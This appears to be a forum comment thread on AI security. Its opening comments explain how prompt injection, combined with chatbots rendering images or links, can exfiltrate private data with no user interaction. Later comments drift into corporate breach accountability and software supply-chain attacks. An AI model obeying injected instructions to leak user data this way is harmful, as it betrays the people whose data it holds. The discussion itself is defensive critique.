It gets even worse when platforms blindly render img tags or the equivalent. Then no user interaction is required to exfil - just showing the image in the UI is enough.
Yup - all the basic HTML injection and xss attacks apply. All the OWASP webdev 101 security issues that have been mostly solved by web frameworks are back in force with AI.
These attacks aren't quite the same as HTML injection and XSS.
LLM-based chatbots rarely have XSS holes. They allow a very strict subset of HTML to be displayed.
The problem is that just supporting images and links is enough to open up a private data exfiltration vector, due to the nature of prompt injection attacks.
yup, basically showing if you ask AI nicely to <insert secret here>, it's dumb enough to do so. And that can then be chained with things that on their own aren't particularly problematic.
> It’s like everyone lost their collective mind and forgot the lessons of the past twenty years.
I think this has it backwards, and actually applies to every safety and security procedure in any field.
Only the experts ever cared about or learned the lessons. The CEOs never learned anything about security; it's someone else's problem. So there was nothing for AI peddlers to forget, they just found a gap in the armor of the "burdensome regulations" and are currently cramming as much as possible through it before it's closed up.
Some (all) CEOs learned that offering a free month coupon/voucher for Future Security Services to secure your information against a breach like the one that just happened on the platform that's offering you a free voucher to secure your data that sits on the platform that was compromised and leaked your data, is a nifty-clean way to handle such legal inconveniences.
Oh, and some supposed financial penalty is claimed, but never really followed up on to see where that money went, or what it accomplished/paid for - and nobody talks about the amount of money that's made by the Legal-man & Machine-owitz LLP Esq. that handles these situations, in a completely opaque manner (such as how much are the legal teams on both sides of the matter making on the 'scandal')?
Techies aren't immune either, before we all follow the "blame management" bandwagon for the 2^101-tieth time.
CEOs aren't the reason supply chain attacks are absolutely rife with problems right now. That's entirely on the technical experts who created all of those pinnacle achievements in tech ranging from tech-led orgs and open source community built package ecosystems. Arbitrary code execution in homebrew, scoop, chocolatey, npm, expo, cocoapods, pip... you name it, it's got infected.
The LastPass data breach happened because _the_ alpha-geek in that building got sloppy and kept the keys to prod on their laptop _and_ got phised.
Yeah supply chain stuff is scary and still very open. This ranges from the easy stuff like typo-squatting pip packages or hacktavists changing their npm packages to wreck all computers in Russia up to the advanced backdoors like the xz hack.
Another big still mostly open category is speculative execution data leaks or other "abstraction breaks" like Rowhammer.
At least in theory things like Passkeys and ubiquitous password manager use should eventually start to cut down on simple phishing attacks.
How do you 'undo' an entire market founded on fixing mistakes that shouldn't have been made once it gets established? Like the US tax system doesn't get some simple problems fixed because there are entire industries reliant upon them not getting fixed. I'm not sure encouraging outsiders to make a business model around patching over things that shouldn't be happening in the first place is the optimal way to solve the issues in the long term.